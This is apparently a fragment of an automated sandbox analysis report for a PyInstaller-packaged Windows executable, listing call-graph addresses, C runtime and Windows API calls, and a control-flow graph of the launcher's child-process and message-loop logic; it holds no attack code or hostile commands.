18532->18533 18539 7ff61e8e60b0 __vcrt_freefls 18532->18539 18534 7ff61e8e2710 54 API calls 18533->18534 18535 7ff61e8e60a5 18534->18535 18535->16669 18536 7ff61e8e61bb 18536->16669 18537 7ff61e8e1470 116 API calls 18537->18539 18538 7ff61e8e2710 54 API calls 18538->18539 18539->18536 18539->18537 18539->18538 18541 7ff61e8e6235 18540->18541 18545 7ff61e8e620c 18540->18545 18545->18541 18554 7ff61e8e5852 GetLastError 18553->18554 18555 7ff61e8e587f GetProcAddress 18553->18555 18556 7ff61e8e585f 18554->18556 18557 7ff61e8e589b GetLastError 18555->18557 18558 7ff61e8e58aa GetProcAddress 18555->18558 18559 7ff61e8e2c50 51 API calls 18556->18559 18557->18556 18560 7ff61e8e58d5 GetProcAddress 18558->18560 18561 7ff61e8e58c6 GetLastError 18558->18561 18562 7ff61e8e5874 18559->18562 18563 7ff61e8e5903 GetProcAddress 18560->18563 18564 7ff61e8e58f1 GetLastError 18560->18564 18561->18556 18562->18471 18565 7ff61e8e591f GetLastError 18563->18565 18566 7ff61e8e5931 GetProcAddress 18563->18566 18564->18556 18565->18556 18567 7ff61e8e595f GetProcAddress 18566->18567 18568 7ff61e8e594d GetLastError 18566->18568 18569 7ff61e8e597b GetLastError 18567->18569 18570 7ff61e8e598d GetProcAddress 18567->18570 18568->18556 18569->18570 18571 7ff61e8e59bb GetProcAddress 18570->18571 18572 7ff61e8e59a9 GetLastError 18570->18572 18572->18571 18645 7ff61e8e542c 18643->18645 18644 7ff61e8e5434 18644->18496 18645->18644 18648 7ff61e8e55d4 18645->18648 18674 7ff61e8f6aa4 18645->18674 18646 7ff61e8e5797 __vcrt_freefls 18646->18496 18647 7ff61e8e47d0 47 API calls 18647->18648 18648->18646 18648->18647 18651 7ff61e8e4cc0 18650->18651 18652 7ff61e8ec550 _log10_special 8 API calls 18651->18652 18653 7ff61e8e4d2a 18652->18653 18653->18502 18653->18503 18655 7ff61e8e4d65 18654->18655 18675 7ff61e8f6ad4 18674->18675 18678 7ff61e8f5fa0 18675->18678 18677 7ff61e8f6b04 18677->18645 18679 7ff61e8f5fe3 18678->18679 18680 7ff61e8f5fd1 18678->18680 18681 7ff61e8f602d 18679->18681 18683 7ff61e8f5ff0 18679->18683 18682 7ff61e8f4f08 _get_daylight 11 API calls 18680->18682 18684 7ff61e8f6048 18681->18684 18687 7ff61e8f47c0 45 API calls 18681->18687 18685 7ff61e8f5fd6 18682->18685 18686 7ff61e8fa814 _invalid_parameter_noinfo 37 API calls 18683->18686 18690 7ff61e8f606a 18684->18690 18699 7ff61e8f6a2c 18684->18699 18689 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18685->18689 18697 7ff61e8f5fe1 18686->18697 18687->18684 18689->18697 18691 7ff61e8f610b 18690->18691 18693 7ff61e8f4f08 _get_daylight 11 API calls 18690->18693 18692 7ff61e8f4f08 _get_daylight 11 API calls 18691->18692 18691->18697 18694 7ff61e8f61b6 18692->18694 18695 7ff61e8f6100 18693->18695 18696 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18694->18696 18698 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18695->18698 18696->18697 18697->18677 18698->18691 18700 7ff61e8f6a4f 18699->18700 18702 7ff61e8f6a66 18699->18702 18705 7ff61e8fff68 18700->18705 18703 7ff61e8f6a54 18702->18703 18710 7ff61e8fff98 18702->18710 18703->18684 18706 7ff61e8fb150 __CxxCallCatchBlock 45 API calls 18705->18706 18707 7ff61e8fff71 18706->18707 18708 7ff61e8fd984 45 API calls 18707->18708 18709 7ff61e8fff8a 18708->18709 18709->18703 18711 7ff61e8f4f4c 45 API calls 18710->18711 18712 7ff61e8fffd1 18711->18712 18716 7ff61e8fffdd 18712->18716 18717 7ff61e902e40 18712->18717 18714 7ff61e8ec550 _log10_special 8 API calls 18716->18714 18718 7ff61e8f4f4c 45 API calls 18717->18718 18751->16673 18753 7ff61e8f541b 18752->18753 18761 7ff61e8ff2a4 18753->18761 18774 7ff61e9002d8 EnterCriticalSection 18761->18774 15923 7ff61e8f9961 15935 7ff61e8fa3d8 15923->15935 15940 7ff61e8fb150 GetLastError 15935->15940 15941 7ff61e8fb174 FlsGetValue 15940->15941 15942 7ff61e8fb191 FlsSetValue 15940->15942 15944 7ff61e8fb181 SetLastError 15941->15944 15945 7ff61e8fb18b 15941->15945 15943 7ff61e8fb1a3 15942->15943 15942->15944 15971 7ff61e8feb98 15943->15971 15949 7ff61e8fb21d 15944->15949 15950 7ff61e8fa3e1 15944->15950 15945->15942 15951 7ff61e8fa504 __CxxCallCatchBlock 38 API calls 15949->15951 15962 7ff61e8fa504 15950->15962 15954 7ff61e8fb222 15951->15954 15952 7ff61e8fb1d0 FlsSetValue 15956 7ff61e8fb1ee 15952->15956 15957 7ff61e8fb1dc FlsSetValue 15952->15957 15953 7ff61e8fb1c0 FlsSetValue 15955 7ff61e8fb1c9 15953->15955 15978 7ff61e8fa948 15955->15978 15984 7ff61e8faef4 15956->15984 15957->15955 16032 7ff61e903650 15962->16032 15976 7ff61e8feba9 _get_daylight 15971->15976 15972 7ff61e8febfa 15992 7ff61e8f4f08 15972->15992 15973 7ff61e8febde HeapAlloc 15974 7ff61e8fb1b2 15973->15974 15973->15976 15974->15952 15974->15953 15976->15972 15976->15973 15989 7ff61e903590 15976->15989 15979 7ff61e8fa94d RtlFreeHeap 15978->15979 15983 7ff61e8fa97c 15978->15983 15980 7ff61e8fa968 GetLastError 15979->15980 15979->15983 15981 7ff61e8fa975 __free_lconv_num 15980->15981 15982 7ff61e8f4f08 _get_daylight 9 API calls 15981->15982 15982->15983 15983->15944 16018 7ff61e8fadcc 15984->16018 15995 7ff61e9035d0 15989->15995 16001 7ff61e8fb2c8 GetLastError 15992->16001 15994 7ff61e8f4f11 15994->15974 16000 7ff61e9002d8 EnterCriticalSection 15995->16000 16002 7ff61e8fb2ec 16001->16002 16003 7ff61e8fb309 FlsSetValue 16001->16003 16002->16003 16016 7ff61e8fb2f9 16002->16016 16004 7ff61e8fb31b 16003->16004 16003->16016 16006 7ff61e8feb98 _get_daylight 5 API calls 16004->16006 16005 7ff61e8fb375 SetLastError 16005->15994 16007 7ff61e8fb32a 16006->16007 16008 7ff61e8fb348 FlsSetValue 16007->16008 16009 7ff61e8fb338 FlsSetValue 16007->16009 16010 7ff61e8fb354 FlsSetValue 16008->16010 16011 7ff61e8fb366 16008->16011 16012 7ff61e8fb341 16009->16012 16010->16012 16013 7ff61e8faef4 _get_daylight 5 API calls 16011->16013 16014 7ff61e8fa948 __free_lconv_num 5 API calls 16012->16014 16015 7ff61e8fb36e 16013->16015 16014->16016 16017 7ff61e8fa948 __free_lconv_num 5 API calls 16015->16017 16016->16005 16017->16005 16030 7ff61e9002d8 EnterCriticalSection 16018->16030 16066 7ff61e903608 16032->16066 16071 7ff61e9002d8 EnterCriticalSection 16066->16071 16136 7ff61e8ebae0 16137 7ff61e8ebb0e 16136->16137 16138 7ff61e8ebaf5 16136->16138 16138->16137 16141 7ff61e8fd5fc 16138->16141 16142 7ff61e8fd647 16141->16142 16146 7ff61e8fd60b _get_daylight 16141->16146 16143 7ff61e8f4f08 _get_daylight 11 API calls 16142->16143 16145 7ff61e8ebb6e 16143->16145 16144 7ff61e8fd62e HeapAlloc 16144->16145 16144->16146 16146->16142 16146->16144 16147 7ff61e903590 _get_daylight 2 API calls 16146->16147 16147->16146 18775 7ff61e8ff98c 18776 7ff61e8ffb7e 18775->18776 18778 7ff61e8ff9ce _isindst 18775->18778 18777 7ff61e8f4f08 _get_daylight 11 API calls 18776->18777 18795 7ff61e8ffb6e 18777->18795 18778->18776 18781 7ff61e8ffa4e _isindst 18778->18781 18779 7ff61e8ec550 _log10_special 8 API calls 18780 7ff61e8ffb99 18779->18780 18796 7ff61e906194 18781->18796 18786 7ff61e8ffbaa 18788 7ff61e8fa900 _isindst 17 API calls 18786->18788 18790 7ff61e8ffbbe 18788->18790 18793 7ff61e8ffaab 18793->18795 18821 7ff61e9061d8 18793->18821 18795->18779 18797 7ff61e9061a3 18796->18797 18798 7ff61e8ffa6c 18796->18798 18828 7ff61e9002d8 EnterCriticalSection 18797->18828 18803 7ff61e905598 18798->18803 18804 7ff61e9055a1 18803->18804 18805 7ff61e8ffa81 18803->18805 18806 7ff61e8f4f08 _get_daylight 11 API calls 18804->18806 18805->18786 18809 7ff61e9055c8 18805->18809 18807 7ff61e9055a6 18806->18807 18808 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18807->18808 18808->18805 18810 7ff61e9055d1 18809->18810 18814 7ff61e8ffa92 18809->18814 18811 7ff61e8f4f08 _get_daylight 11 API calls 18810->18811 18812 7ff61e9055d6 18811->18812 18813 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18812->18813 18813->18814 18814->18786 18815 7ff61e9055f8 18814->18815 18816 7ff61e905601 18815->18816 18817 7ff61e8ffaa3 18815->18817 18818 7ff61e8f4f08 _get_daylight 11 API calls 18816->18818 18817->18786 18817->18793 18819 7ff61e905606 18818->18819 18820 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18819->18820 18820->18817 18829 7ff61e9002d8 EnterCriticalSection 18821->18829 20600 7ff61e9016b0 20611 7ff61e9073e4 20600->20611 20612 7ff61e9073f1 20611->20612 20613 7ff61e8fa948 __free_lconv_num 11 API calls 20612->20613 20614 7ff61e90740d 20612->20614 20613->20612 20615 7ff61e8fa948 __free_lconv_num 11 API calls 20614->20615 20616 7ff61e9016b9 20614->20616 20615->20614 20617 7ff61e9002d8 EnterCriticalSection 20616->20617 19142 7ff61e90adfe 19143 7ff61e90ae17 19142->19143 19144 7ff61e90ae0d 19142->19144 19146 7ff61e900338 LeaveCriticalSection 19144->19146 18830 7ff61e8f5628 18831 7ff61e8f5642 18830->18831 18832 7ff61e8f565f 18830->18832 18833 7ff61e8f4ee8 _fread_nolock 11 API calls 18831->18833 18832->18831 18834 7ff61e8f5672 CreateFileW 18832->18834 18835 7ff61e8f5647 18833->18835 18836 7ff61e8f56dc 18834->18836 18837 7ff61e8f56a6 18834->18837 18840 7ff61e8f4f08 _get_daylight 11 API calls 18835->18840 18881 7ff61e8f5c04 18836->18881 18855 7ff61e8f577c GetFileType 18837->18855 18843 7ff61e8f564f 18840->18843 18848 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18843->18848 18844 7ff61e8f56d1 CloseHandle 18849 7ff61e8f565a 18844->18849 18845 7ff61e8f56bb CloseHandle 18845->18849 18846 7ff61e8f56e5 18850 7ff61e8f4e7c _fread_nolock 11 API calls 18846->18850 18847 7ff61e8f5710 18902 7ff61e8f59c4 18847->18902 18848->18849 18854 7ff61e8f56ef 18850->18854 18854->18849 18856 7ff61e8f57ca 18855->18856 18857 7ff61e8f5887 18855->18857 18858 7ff61e8f57f6 GetFileInformationByHandle 18856->18858 18862 7ff61e8f5b00 21 API calls 18856->18862 18859 7ff61e8f58b1 18857->18859 18860 7ff61e8f588f 18857->18860 18863 7ff61e8f58a2 GetLastError 18858->18863 18864 7ff61e8f581f 18858->18864 18861 7ff61e8f58d4 PeekNamedPipe 18859->18861 18870 7ff61e8f5872 18859->18870 18860->18863 18865 7ff61e8f5893 18860->18865 18861->18870 18866 7ff61e8f57e4 18862->18866 18869 7ff61e8f4e7c _fread_nolock 11 API calls 18863->18869 18867 7ff61e8f59c4 51 API calls 18864->18867 18868 7ff61e8f4f08 _get_daylight 11 API calls 18865->18868 18866->18858 18866->18870 18872 7ff61e8f582a 18867->18872 18868->18870 18869->18870 18871 7ff61e8ec550 _log10_special 8 API calls 18870->18871 18873 7ff61e8f56b4 18871->18873 18919 7ff61e8f5924 18872->18919 18873->18844 18873->18845 18876 7ff61e8f5924 10 API calls 18877 7ff61e8f5849 18876->18877 18878 7ff61e8f5924 10 API calls 18877->18878 18879 7ff61e8f585a 18878->18879 18879->18870 18880 7ff61e8f4f08 _get_daylight 11 API calls 18879->18880 18880->18870 18882 7ff61e8f5c3a 18881->18882 18883 7ff61e8f4f08 _get_daylight 11 API calls 18882->18883 18901 7ff61e8f5cd2 __vcrt_freefls 18882->18901 18885 7ff61e8f5c4c 18883->18885 18884 7ff61e8ec550 _log10_special 8 API calls 18886 7ff61e8f56e1 18884->18886 18887 7ff61e8f4f08 _get_daylight 11 API calls 18885->18887 18886->18846 18886->18847 18888 7ff61e8f5c54 18887->18888 18889 7ff61e8f7e08 45 API calls 18888->18889 18890 7ff61e8f5c69 18889->18890 18891 7ff61e8f5c71 18890->18891 18892 7ff61e8f5c7b 18890->18892 18893 7ff61e8f4f08 _get_daylight 11 API calls 18891->18893 18894 7ff61e8f4f08 _get_daylight 11 API calls 18892->18894 18897 7ff61e8f5c76 18893->18897 18895 7ff61e8f5c80 18894->18895 18896 7ff61e8f4f08 _get_daylight 11 API calls 18895->18896 18895->18901 18898 7ff61e8f5c8a 18896->18898 18899 7ff61e8f5cc4 GetDriveTypeW 18897->18899 18897->18901 18900 7ff61e8f7e08 45 API calls 18898->18900 18899->18901 18900->18897 18901->18884 18904 7ff61e8f59ec 18902->18904 18903 7ff61e8f571d 18912 7ff61e8f5b00 18903->18912 18904->18903 18926 7ff61e8ff724 18904->18926 18906 7ff61e8f5a80 18906->18903 18907 7ff61e8ff724 51 API calls 18906->18907 18908 7ff61e8f5a93 18907->18908 18908->18903 18909 7ff61e8ff724 51 API calls 18908->18909 18910 7ff61e8f5aa6 18909->18910 18910->18903 18911 7ff61e8ff724 51 API calls 18910->18911 18911->18903 18913 7ff61e8f5b1a 18912->18913 18914 7ff61e8f5b51 18913->18914 18915 7ff61e8f5b2a 18913->18915 18917 7ff61e8ff5b8 21 API calls 18914->18917 18916 7ff61e8f5b3a 18915->18916 18918 7ff61e8f4e7c _fread_nolock 11 API calls 18915->18918 18916->18854 18917->18916 18918->18916 18920 7ff61e8f5940 18919->18920 18921 7ff61e8f594d FileTimeToSystemTime 18919->18921 18920->18921 18923 7ff61e8f5948 18920->18923 18922 7ff61e8f5961 SystemTimeToTzSpecificLocalTime 18921->18922 18921->18923 18922->18923 18924 7ff61e8ec550 _log10_special 8 API calls 18923->18924 18925 7ff61e8f5839 18924->18925 18925->18876 18927 7ff61e8ff731 18926->18927 18928 7ff61e8ff755 18926->18928 18927->18928 18929 7ff61e8ff736 18927->18929 18930 7ff61e8ff78f 18928->18930 18933 7ff61e8ff7ae 18928->18933 18931 7ff61e8f4f08 _get_daylight 11 API calls 18929->18931 18932 7ff61e8f4f08 _get_daylight 11 API calls 18930->18932 18934 7ff61e8ff73b 18931->18934 18935 7ff61e8ff794 18932->18935 18936 7ff61e8f4f4c 45 API calls 18933->18936 18937 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18934->18937 18938 7ff61e8fa8e0 _invalid_parameter_noinfo 37 API calls 18935->18938 18942 7ff61e8ff7bb 18936->18942 18939 7ff61e8ff746 18937->18939 18940 7ff61e8ff79f 18938->18940 18939->18906 18940->18906 18941 7ff61e9004dc 51 API calls 18941->18942 18942->18940 18942->18941 19158 7ff61e907c20 19161 7ff61e9025f0 19158->19161 19162 7ff61e9025fd 19161->19162 19166 7ff61e902642 19161->19166 19167 7ff61e8fb224 19162->19167 19168 7ff61e8fb235 FlsGetValue 19167->19168 19169 7ff61e8fb250 FlsSetValue 19167->19169 19170 7ff61e8fb242 19168->19170 19171 7ff61e8fb24a 19168->19171 19169->19170 19172 7ff61e8fb25d 19169->19172 19174 7ff61e8fa504 __CxxCallCatchBlock 45 API calls 19170->19174 19176 7ff61e8fb248 19170->19176 19171->19169 19173 7ff61e8feb98 _get_daylight 11 API calls 19172->19173 19175 7ff61e8fb26c 19173->19175 19177 7ff61e8fb2c5 19174->19177 19178 7ff61e8fb28a FlsSetValue 19175->19178 19179 7ff61e8fb27a FlsSetValue 19175->19179 19187 7ff61e9022c4 19176->19187 19181 7ff61e8fb2a8 19178->19181 19182 7ff61e8fb296 FlsSetValue 19178->19182 19180 7ff61e8fb283 19179->19180 19183 7ff61e8fa948 __free_lconv_num 11 API calls 19180->19183 19184 7ff61e8faef4 _get_daylight 11 API calls 19181->19184 19182->19180 19183->19170 19185 7ff61e8fb2b0 19184->19185 19186 7ff61e8fa948 __free_lconv_num 11 API calls 19185->19186 19186->19176 19210 7ff61e902534 19187->19210 19189 7ff61e9022f9 19225 7ff61e901fc4 19189->19225 19192 7ff61e8fd5fc _fread_nolock 12 API calls 19193 7ff61e902327 19192->19193 19194 7ff61e90232f 19193->19194 19196 7ff61e90233e 19193->19196 19195 7ff61e8fa948 __free_lconv_num 11 API calls 19194->19195 19208 7ff61e902316 19195->19208 19196->19196 19232 7ff61e90266c 19196->19232 19199 7ff61e90243a 19200 7ff61e8f4f08 _get_daylight 11 API calls 19199->19200 19202 7ff61e90243f 19200->19202 19201 7ff61e902495 19209 7ff61e9024fc 19201->19209 19243 7ff61e901df4 19201->19243 19204 7ff61e8fa948 __free_lconv_num 11 API calls 19202->19204 19203 7ff61e902454 19203->19201 19205 7ff61e8fa948 __free_lconv_num 11 API calls 19203->19205 19204->19208 19205->19201 19207 7ff61e8fa948 __free_lconv_num 11 API calls 19207->19208 19208->19166 19209->19207 19211 7ff61e902557 19210->19211 19212 7ff61e902561 19211->19212 19258 7ff61e9002d8 EnterCriticalSection 19211->19258 19214 7ff61e9025d3 19212->19214 19217 7ff61e8fa504 __CxxCallCatchBlock 45 API calls 19212->19217 19214->19189 19219 7ff61e9025eb 19217->19219 19221 7ff61e902642 19219->19221 19222 7ff61e8fb224 50 API calls 19219->19222 19221->19189 19223 7ff61e90262c 19222->19223 19224 7ff61e9022c4 65 API calls 19223->19224 19224->19221 19226 7ff61e8f4f4c 45 API calls 19225->19226 19227 7ff61e901fd8 19226->19227 19228 7ff61e901fe4 GetOEMCP 19227->19228 19229 7ff61e901ff6 19227->19229 19230 7ff61e90200b 19228->19230 19229->19230 19231 7ff61e901ffb GetACP 19229->19231 19230->19192 19230->19208 19231->19230 19233 7ff61e901fc4 47 API calls 19232->19233 19234 7ff61e902699 19233->19234 19235 7ff61e9027ef 19234->19235 19237 7ff61e9026d6 IsValidCodePage 19234->19237 19242 7ff61e9026f0 __scrt_get_show_window_mode 19234->19242 19236 7ff61e8ec550 _log10_special 8 API calls 19235->19236 19238 7ff61e902431 19236->19238 19237->19235 19239 7ff61e9026e7 19237->19239 19238->19199 19238->19203 19240 7ff61e902716 GetCPInfo 19239->19240 19239->19242 19240->19235 19240->19242 19259 7ff61e9020dc 19242->19259 19325 7ff61e9002d8 EnterCriticalSection 19243->19325 19260 7ff61e902119 GetCPInfo 19259->19260 19269 7ff61e90220f 19259->19269 19261 7ff61e90212c 19260->19261 19260->19269 19263 7ff61e902e40 48 API calls 19261->19263 19262 7ff61e8ec550 _log10_special 8 API calls 19264 7ff61e9022ae 19262->19264 19265 7ff61e9021a3 19263->19265 19264->19235 19270 7ff61e907b84 19265->19270 19268 7ff61e907b84 54 API calls 19268->19269 19269->19262 19271 7ff61e8f4f4c 45 API calls 19270->19271 19272 7ff61e907ba9 19271->19272 19275 7ff61e907850 19272->19275 19276 7ff61e907891 19275->19276 19277 7ff61e8ff8a0 _fread_nolock MultiByteToWideChar 19276->19277 19281 7ff61e9078db 19277->19281 19278 7ff61e907b59 19279 7ff61e8ec550 _log10_special 8 API calls 19278->19279 19280 7ff61e9021d6 19279->19280 19280->19268 19281->19278 19282 7ff61e8fd5fc _fread_nolock 12 API calls 19281->19282 19283 7ff61e907a11 19281->19283 19284 7ff61e907913 19281->19284 19282->19284 19283->19278 19285 7ff61e8fa948 __free_lconv_num 11 API calls 19283->19285 19284->19283 19286 7ff61e8ff8a0 _fread_nolock MultiByteToWideChar 19284->19286 19285->19278 19287 7ff61e907986 19286->19287 19287->19283 19306 7ff61e8ff0e4 19287->19306 19290 7ff61e907a22 19292 7ff61e8fd5fc _fread_nolock 12 API calls 19290->19292 19294 7ff61e907af4 19290->19294 19296 7ff61e907a40 19290->19296 19291 7ff61e9079d1 19291->19283 19293 7ff61e8ff0e4 __crtLCMapStringW 6 API calls 19291->19293 19292->19296 19293->19283 19294->19283 19295 7ff61e8fa948 __free_lconv_num 11 API calls 19294->19295 19295->19283 19296->19283 19297 7ff61e8ff0e4 __crtLCMapStringW 6 API calls 19296->19297 19298 7ff61e907ac0 19297->19298 19298->19294 19299 7ff61e907ae0 19298->19299 19300 7ff61e907af6 19298->19300 19301 7ff61e9007e8 WideCharToMultiByte 19299->19301 19302 7ff61e9007e8 WideCharToMultiByte 19300->19302 19303 7ff61e907aee 19301->19303 19302->19303 19303->19294 19304 7ff61e907b0e 19303->19304 19304->19283 19305 7ff61e8fa948 __free_lconv_num 11 API calls 19304->19305 19305->19283 19312 7ff61e8fed10 19306->19312 19310 7ff61e8ff193 LCMapStringW 19311 7ff61e8ff12a 19310->19311 19311->19283 19311->19290 19311->19291 19313 7ff61e8fed6d 19312->19313 19320 7ff61e8fed68 __vcrt_FlsAlloc 19312->19320 19313->19311 19322 7ff61e8ff1d0 19313->19322 19314 7ff61e8fed9d LoadLibraryExW 19316 7ff61e8fee72 19314->19316 19317 7ff61e8fedc2 GetLastError 19314->19317 19315 7ff61e8fee92 GetProcAddress 19315->19313 19319 7ff61e8feea3 19315->19319 19316->19315 19318 7ff61e8fee89 FreeLibrary 19316->19318 19317->19320 19318->19315 19319->19313 19320->19313 19320->19314 19320->19315 19321 7ff61e8fedfc LoadLibraryExW 19320->19321 19321->19316 19321->19320 19323 7ff61e8fed10 __crtLCMapStringW 5 API calls 19322->19323 19324 7ff61e8ff1fe __crtLCMapStringW 19323->19324 19324->19310 20194 7ff61e8fc520 20205 7ff61e9002d8 EnterCriticalSection 20194->20205

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 7ff61e8e89e0-7ff61e8e8b26 call 7ff61e8ec850 call 7ff61e8e9390 SetConsoleCtrlHandler GetStartupInfoW call 7ff61e8f53f0 call 7ff61e8fa47c call 7ff61e8f871c call 7ff61e8f53f0 call 7ff61e8fa47c call 7ff61e8f871c call 7ff61e8f53f0 call 7ff61e8fa47c call 7ff61e8f871c GetCommandLineW CreateProcessW 23 7ff61e8e8b4d-7ff61e8e8b89 RegisterClassW 0->23 24 7ff61e8e8b28-7ff61e8e8b48 GetLastError call 7ff61e8e2c50 0->24 26 7ff61e8e8b91-7ff61e8e8be5 CreateWindowExW 23->26 27 7ff61e8e8b8b GetLastError 23->27 31 7ff61e8e8e39-7ff61e8e8e5f call 7ff61e8ec550 24->31 29 7ff61e8e8bef-7ff61e8e8bf4 ShowWindow 26->29 30 7ff61e8e8be7-7ff61e8e8bed GetLastError 26->30 27->26 32 7ff61e8e8bfa-7ff61e8e8c0a WaitForSingleObject 29->32 30->32 34 7ff61e8e8c0c 32->34 35 7ff61e8e8c88-7ff61e8e8c8f 32->35 39 7ff61e8e8c10-7ff61e8e8c13 34->39 36 7ff61e8e8cd2-7ff61e8e8cd9 35->36 37 7ff61e8e8c91-7ff61e8e8ca1 WaitForSingleObject 35->37 42 7ff61e8e8dc0-7ff61e8e8dd9 GetMessageW 36->42 43 7ff61e8e8cdf-7ff61e8e8cf5 QueryPerformanceFrequency QueryPerformanceCounter 36->43 40 7ff61e8e8df8-7ff61e8e8e02 37->40 41 7ff61e8e8ca7-7ff61e8e8cb7 TerminateProcess 37->41 44 7ff61e8e8c15 GetLastError 39->44 45 7ff61e8e8c1b-7ff61e8e8c22 39->45 49 7ff61e8e8e04-7ff61e8e8e0a DestroyWindow 40->49 50 7ff61e8e8e11-7ff61e8e8e35 GetExitCodeProcess CloseHandle * 2 40->50 51 7ff61e8e8cbf-7ff61e8e8ccd WaitForSingleObject 41->51 52 7ff61e8e8cb9 GetLastError 41->52 47 7ff61e8e8def-7ff61e8e8df6 42->47 48 7ff61e8e8ddb-7ff61e8e8de9 TranslateMessage DispatchMessageW 42->48 53 7ff61e8e8d00-7ff61e8e8d38 MsgWaitForMultipleObjects PeekMessageW 43->53 44->45 45->37 46 7ff61e8e8c24-7ff61e8e8c41 PeekMessageW 45->46 54 7ff61e8e8c43-7ff61e8e8c74 TranslateMessage DispatchMessageW PeekMessageW 46->54 55 7ff61e8e8c76-7ff61e8e8c86 WaitForSingleObject 46->55 47->40 47->42 48->47 49->50 50->31 51->40 52->51 56 7ff61e8e8d73-7ff61e8e8d7a 53->56 57 7ff61e8e8d3a 53->57 54->54 54->55 55->35 55->39 56->42 59 7ff61e8e8d7c-7ff61e8e8da5 QueryPerformanceCounter 56->59 58 7ff61e8e8d40-7ff61e8e8d71 TranslateMessage DispatchMessageW PeekMessageW 57->58 58->56 58->58 59->53 60 7ff61e8e8dab-7ff61e8e8db2 59->60 60->40 61 7ff61e8e8db4-7ff61e8e8db8 60->61 61->42
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000004.00000002.2214920366.00007FF61E8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF61E8E0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000004.00000002.2214831894.00007FF61E8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215013020.00007FF61E90B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E91E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215142503.00007FF61E922000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000004.00000002.2215315967.00007FF61E924000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_4_2_7ff61e8e0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                • Instruction ID: aa5885aa83c616290d9219af21ec89d4ae7459d17a42b52ad0a2206c30934fcc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84D16132A18F8286EB508F35E8542AD7764FFA4F68F540635EA5EC3AA5DF3CE5448700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 62 7ff61e8e1000-7ff61e8e3806 call 7ff61e8efe18 call 7ff61e8efe20 call 7ff61e8ec850 call 7ff61e8f53f0 call 7ff61e8f5484 call 7ff61e8e36b0 76 7ff61e8e3814-7ff61e8e3836 call 7ff61e8e1950 62->76 77 7ff61e8e3808-7ff61e8e380f 62->77 82 7ff61e8e391b-7ff61e8e3931 call 7ff61e8e45c0 76->82 83 7ff61e8e383c-7ff61e8e3856 call 7ff61e8e1c80 76->83 78 7ff61e8e3c97-7ff61e8e3cb2 call 7ff61e8ec550 77->78 90 7ff61e8e3933-7ff61e8e3960 call 7ff61e8e7f90 82->90 91 7ff61e8e396a-7ff61e8e397f call 7ff61e8e2710 82->91 87 7ff61e8e385b-7ff61e8e389b call 7ff61e8e8830 83->87 96 7ff61e8e38c1-7ff61e8e38cc call 7ff61e8f4f30 87->96 97 7ff61e8e389d-7ff61e8e38a3 87->97 103 7ff61e8e3962-7ff61e8e3965 call 7ff61e8f004c 90->103 104 7ff61e8e3984-7ff61e8e39a6 call 7ff61e8e1c80 90->104 99 7ff61e8e3c8f 91->99 111 7ff61e8e38d2-7ff61e8e38e1 call 7ff61e8e8830 96->111 112 7ff61e8e39fc-7ff61e8e3a2a call 7ff61e8e8940 call 7ff61e8e89a0 * 3 96->112 100 7ff61e8e38a5-7ff61e8e38ad 97->100 101 7ff61e8e38af-7ff61e8e38bd call 7ff61e8e89a0 97->101 99->78 100->101 101->96 103->91 113 7ff61e8e39b0-7ff61e8e39b9 104->113 119 7ff61e8e39f4-7ff61e8e39f7 call 7ff61e8f4f30 111->119 120 7ff61e8e38e7-7ff61e8e38ed 111->120 138 7ff61e8e3a2f-7ff61e8e3a3e call 7ff61e8e8830 112->138 113->113 117 7ff61e8e39bb-7ff61e8e39d8 call 7ff61e8e1950 113->117 117->87 130 7ff61e8e39de-7ff61e8e39ef call 7ff61e8e2710 117->130 119->112 123 7ff61e8e38f0-7ff61e8e38fc 120->123 127 7ff61e8e3905-7ff61e8e3908 123->127 128 7ff61e8e38fe-7ff61e8e3903 123->128 127->119 131 7ff61e8e390e-7ff61e8e3916 call 7ff61e8f4f30 127->131 128->123 128->127 130->99 131->138 141 7ff61e8e3b45-7ff61e8e3b53 138->141 142 7ff61e8e3a44-7ff61e8e3a47 138->142 143 7ff61e8e3a67 141->143 144 7ff61e8e3b59-7ff61e8e3b5d 141->144 142->141 145 7ff61e8e3a4d-7ff61e8e3a50 142->145 146 7ff61e8e3a6b-7ff61e8e3a90 call 7ff61e8f4f30 